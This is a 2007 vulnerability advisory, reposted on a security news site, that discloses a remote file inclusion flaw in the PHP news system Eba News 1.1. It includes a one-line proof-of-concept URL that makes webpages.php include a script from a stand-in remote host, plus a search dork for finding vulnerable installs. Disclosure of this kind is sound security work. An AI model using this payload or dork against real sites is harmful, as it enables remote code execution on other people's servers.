Computer Security

Security Advisory: Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [Full-disclosure] freePBX 2.2.x's Music-on-hold Remote Code Execution Injection

  NeatUpload vulnerability and fix

  [waraxe-2007-SA#049] - Multiple vulnerabilities in Phorum 5.1.20

  IPB (Invision Power Board) Full Path Disclusure

From:seko_(at)_se-ko.info <seko_(at)_se-ko.info>
Date:20.04.2007
Subject:Eba News Version : v1.1 <= (webpages.php) Remote File Include // starhack.org

--------------------------------------------------
Eba News Version : v1.1 <=  (webpages.php) Remote File Include
--------------------------------------------------

Author          : SekoMirza
Date Found      : Nisan 11 2007
Location        : Fransa // ...
Critical Lvl    : Highly critical
Impact          : System access
Where           : From Remote
--------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~
Application     : Eba News
version         : 1.1
vendor          : http://ebascripts.com/
source url      : http://ebascripts.com/
--------------------------------------------------

Description:
~~~~~~~~

EBA-News is a powerful and open-source news management system, written in PHP which utilizes MySQL as the backend. It provides a friendly user interface with a great functionality. With automatic installation, you can have a professional looking and secure news management system ready to use in mere minutes.



--------------------------------------------------

Vulnerability:
~~~~~~~~~~~

I found vulnerability script in admin/public/webpages.php


Proof Of Concept:
~~~~~~~~~~~~

eba/admin/public/webpages.php?filename=http://attact.com/colok.txt?

--------------------------------------------------

google d0rk:
~~~~~~~
"Eba News"

--------------------------------------------------
Solution:
~~~
- download new version in vendor URL

--------------------------------------------------
Shoutz:
~~
~ My  Sweet       -> Caramel
~ For Mp3s        -> Hypn0sis
~ For Support     -> www.starhack.org
~ My  Bro         -> PhantomOrchid
~ My  Preceptor   -> Earnk Kazno


--------------------------------------------------

Contact:
~~~

    Seko[at]se-ko[dot]info
    
-------------------------------- [ EOF ]----------

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod
 


Rating@Mail.ru